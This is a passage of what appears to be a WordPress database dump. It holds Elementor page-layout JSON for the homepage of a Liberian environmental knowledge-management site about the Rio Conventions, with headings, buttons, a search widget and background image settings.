fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#002600\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\"},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49af793\",\"elType\":\"widget\",\"settings\":{\"items_list\":[{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd-1.jpg\",\"id\":1854},\"item_title\":\"The United Nations Convention on Biological Diversity\",\"item_text\":\"\",\"item_link\":\"#\",\"item_link_target\":\"\",\"_id\":\"7311fcf\",\"item_content_type\":\"default\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/plugins\\/elementor\\/assets\\/images\\/placeholder.png\",\"id\":\"\"},\"item_content_type\":\"default\",\"item_title\":\"\",\"item_text\":\"\",\"item_link\":\"\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"8abca95\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/plugins\\/elementor\\/assets\\/images\\/placeholder.png\",\"id\":\"\"},\"item_content_type\":\"default\",\"item_title\":\"\",\"item_text\":\"\",\"item_link\":\"\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"6b2d2f2\"}],\"item_layout\":\"banners\",\"animation_effect\":\"oscar\",\"img_size\":\"medium\",\"title_html_tag\":\"h4\",\"equal_height_cols\":\"true\",\"slides_to_show\":\"3\",\"slides_to_scroll\":\"3\",\"dots\":\"true\",\"pause_on_hover\":\"true\",\"background_background\":\"classic\",\"normal_opacity\":0.4,\"items_title_color\":\"#ffffff\",\"items_title_typography_typography\":\"custom\",\"items_title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"jet-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(11436,1857,'_elementor_version','2.7.5'),(11437,1857,'_elementor_template_type','wp-page'),(11438,1857,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(11440,1858,'_wp_page_template','default'),(11441,1858,'_elementor_edit_mode','builder'),(11442,1858,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd.jpg\",\"id\":531},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"